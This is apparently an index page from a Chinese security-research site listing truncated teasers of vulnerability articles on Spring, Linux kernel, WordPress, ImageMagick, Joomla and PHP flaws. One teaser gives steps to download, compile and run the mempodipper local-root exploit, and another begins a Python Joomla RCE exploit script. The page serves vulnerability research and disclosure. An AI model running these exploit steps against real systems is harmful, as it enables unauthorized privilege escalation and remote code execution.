安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
邮箱安全漏洞分享
返回首页
  • [漏洞分享] Spring framework(cve-2010-1622)漏洞利用指南 日期::2017-06-02点击:154 好评:0

    摘要 这个 漏洞 在2010年出的,当时由于环境问题,并没有找到稳定利用的EXP。作者对spring mvc框架不熟悉,很多地方不了解,结果研究了一半,证明了漏洞的部分严重性就放下了,没有弄出POC来。最近同事也想研究下,勾起了研究...

  • [漏洞分享] Linux 2.6.32内核提权exp 日期::2017-02-27点击:321 好评:0

    linux 2.6.32内核提权exp,13年建立博客的时候就共享过的,后来因为现实有事博客就关了,现在又重新开上了,所以顺便把这个贴上吧。 支持版本: Linux localhost.domain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64 Linux localhost.domain...

  • [漏洞分享] Linux 2.6.39 到 3.2.0 爆提权漏洞 日期::2017-02-27点击:193 好评:0

    Linux 2.6.39 到 3.2.0 内核爆提权漏洞,普通用户可以通过运行特定代码获得 root 权限。 重现方法: wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c cc mempodipper.c ./a.out 在执行完毕后运行 whoami 来看是否执行成功。 已知发行版情况: Deb...

  • [漏洞分享] SWEET32: TLS 64位分组密码生日攻击(CVE-2016-2183) 日期::2016-08-28点击:108 好评:0

    传统64位块分组密码在使用CBC模式时很容易被碰撞攻击。SSL/TLS协议所有支持使用3DES对称加密的密码套件都受影响(例如 ECDHE-RSA-DES-CBC3-SHA)。红帽企业版Linux6和7自带的OpenSSL版本中,基于DES的密...

  • [漏洞分享] worpress Photo Gallery 上传漏洞 日期::2016-08-22点击:86 好评:0

    1. Description Every registered user (even Subscriber) can access upload functionality because of read role used inside UploadHandler.php http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html 2. Proof of Concept Login as regular user (...

  • [漏洞分享] Remote Command Execute in Wordpress 4.5.1[Write Up]附解决办法 日期::2016-05-05点击:197 好评:0

    ImageMagick ImageMagick 昨天曝出 CVE-2016-3714,Java、PHP 的库也受其影响。其中 PHP 的库 Imagick 应用广泛,波及也大。Wordpress 也就是受此漏洞影响出现了 RCE。 这个漏洞很蠢,ImageMagick 在 MagickCore/const...

  • [漏洞分享] Joomla 1.5 - 3.4.5 - 对象注入与远程代码执行漏洞 日期::2015-12-16点击:117 好评:0

    importrequests#easy_installrequests defget_url(url,user_agent): headers={ User-Agent :user_agent } cookies=requests.get(url,headers=headers).cookies for _inrange(3): response=requests.get(url,headers=headers,cookies=cookies) return response defphp_str_noq...

  • [漏洞分享] PHP远程DoS漏洞分析
及防护方案 日期::2015-05-22点击:92 好评:0

    执行摘要 5月14日,国内爆出php远程DoS漏洞,官方编号69364。利用该漏洞构造poc发起链接,很容易导致目标主机cpu的占用率100%,涉及PHP多个版本。绿盟科技威胁响应中心随即启动应急机制, 应急响应工作随即启动。 15日夜,启动漏...

  • [漏洞分享] PHP Fileinfo cdf_check_stream_offset函数拒绝服务漏洞 日期::2015-04-13点击:9 好评:0

    受影响系统: PHP PHP 5.5.14 PHP PHP 5.4.30 描述: -------------------------------------------------------------------------------- CVE(CAN) ID: CVE-2014-3479 PHP是一种通用开源脚本语言。 PHP 5.4.30之前版本、5.5.14之前版本,Fileinfo组件中使用的file内,cdf.c的cdf...

  • [漏洞分享] PHP Fileinfo cdf_read_short_sector函数拒绝服务漏洞 日期::2015-04-13点击:8 好评:0

    ...

推荐内容